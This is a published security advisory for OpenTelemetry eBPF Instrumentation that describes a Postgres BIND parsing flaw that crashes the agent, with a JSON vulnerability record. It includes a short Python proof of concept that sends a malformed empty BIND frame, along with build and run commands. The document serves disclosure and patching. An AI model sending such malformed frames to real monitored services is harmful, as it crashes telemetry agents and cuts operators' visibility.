GHSA-PGVV-Q3WF-MM9M
Vulnerability from github – Published: 2026-05-18 17:56 – Updated: 2026-05-18 17:56Summary
The Postgres protocol parser assumes BIND message payloads contain a valid NUL-terminated portal name. A crafted empty or unterminated payload can make OBI slice beyond the end of the captured buffer and panic.
Details
The vulnerable logic is in pkg/ebpf/common/sql_detect_postgres.go. In the BIND case, OBI converts the full payload to a string with unix.ByteSliceToString(msg.data), computes portalLen := len(portal) + 1, and then slices msg.data[portalLen:] to derive the statement name.
There is no check that msg.data actually contains a NUL terminator or even enough bytes for portalLen. With an empty payload or a truncated message, portalLen can exceed the slice length and trigger a runtime panic.
PoC
Local testing with a minimal reproducer showed the expected slice bounds out of range crash for an empty BIND payload.
Use a vulnerable build:
git checkout v0.0.0-rc.1+build
make build
Start a local Postgres instance and OBI:
docker run --rm -e POSTGRES_PASSWORD=postgres -p 5432:5432 postgres:17
sudo ./bin/obi
Send a malformed BIND frame with an empty payload:
# save as /tmp/pg-bind-poc.py
import socket, struct
tag = b'B'
length = struct.pack(">I", 4)
payload = b""
s = socket.create_connection(("127.0.0.1", 5432))
s.sendall(tag + length + payload)
s.close()
Run it:
python3 /tmp/pg-bind-poc.py
On a vulnerable build, the Postgres parser in OBI panics while processing the captured payload.
Impact
This is a remote availability issue in OBI's Postgres parser. Any attacker able to send malformed Postgres traffic to a monitored service can crash the agent and stop telemetry collection for that node or process.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "go.opentelemetry.io/obi"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45678"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-754"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-18T17:56:26Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThe Postgres protocol parser assumes `BIND` message payloads contain a valid NUL-terminated portal name. A crafted empty or unterminated payload can make OBI slice beyond the end of the captured buffer and panic.\n\n### Details\n\nThe vulnerable logic is in [pkg/ebpf/common/sql_detect_postgres.go](https://github.com/open-telemetry/opentelemetry-ebpf-instrumentation/blob/d5691806adc98008bacd2b7a4a4e0cd38ea51227/pkg/components/ebpf/common/sql_detect_postgres.go#L286-L294). In the `BIND` case, OBI converts the full payload to a string with `unix.ByteSliceToString(msg.data)`, computes `portalLen := len(portal) + 1`, and then slices `msg.data[portalLen:]` to derive the statement name.\n\nThere is no check that `msg.data` actually contains a NUL terminator or even enough bytes for `portalLen`. With an empty payload or a truncated message, `portalLen` can exceed the slice length and trigger a runtime panic.\n\n### PoC\n\nLocal testing with a minimal reproducer showed the expected `slice bounds out of range` crash for an empty BIND payload.\n\nUse a vulnerable build:\n\n```bash\ngit checkout v0.0.0-rc.1+build\nmake build\n```\n\nStart a local Postgres instance and OBI:\n\n```bash\ndocker run --rm -e POSTGRES_PASSWORD=postgres -p 5432:5432 postgres:17\nsudo ./bin/obi\n```\n\nSend a malformed `BIND` frame with an empty payload:\n\n```python\n# save as /tmp/pg-bind-poc.py\nimport socket, struct\n\ntag = b\u0027B\u0027\nlength = struct.pack(\"\u003eI\", 4)\npayload = b\"\"\n\ns = socket.create_connection((\"127.0.0.1\", 5432))\ns.sendall(tag + length + payload)\ns.close()\n```\n\nRun it:\n\n```bash\npython3 /tmp/pg-bind-poc.py\n```\n\nOn a vulnerable build, the Postgres parser in OBI panics while processing the captured payload.\n\n### Impact\n\nThis is a remote availability issue in OBI\u0027s Postgres parser. Any attacker able to send malformed Postgres traffic to a monitored service can crash the agent and stop telemetry collection for that node or process.",
"id": "GHSA-pgvv-q3wf-mm9m",
"modified": "2026-05-18T17:56:26Z",
"published": "2026-05-18T17:56:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-telemetry/opentelemetry-ebpf-instrumentation/security/advisories/GHSA-pgvv-q3wf-mm9m"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-telemetry/opentelemetry-ebpf-instrumentation"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "OpenTelemetry eBPF Instrumentation: Postgres BIND parsing can panic on malformed payloads"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.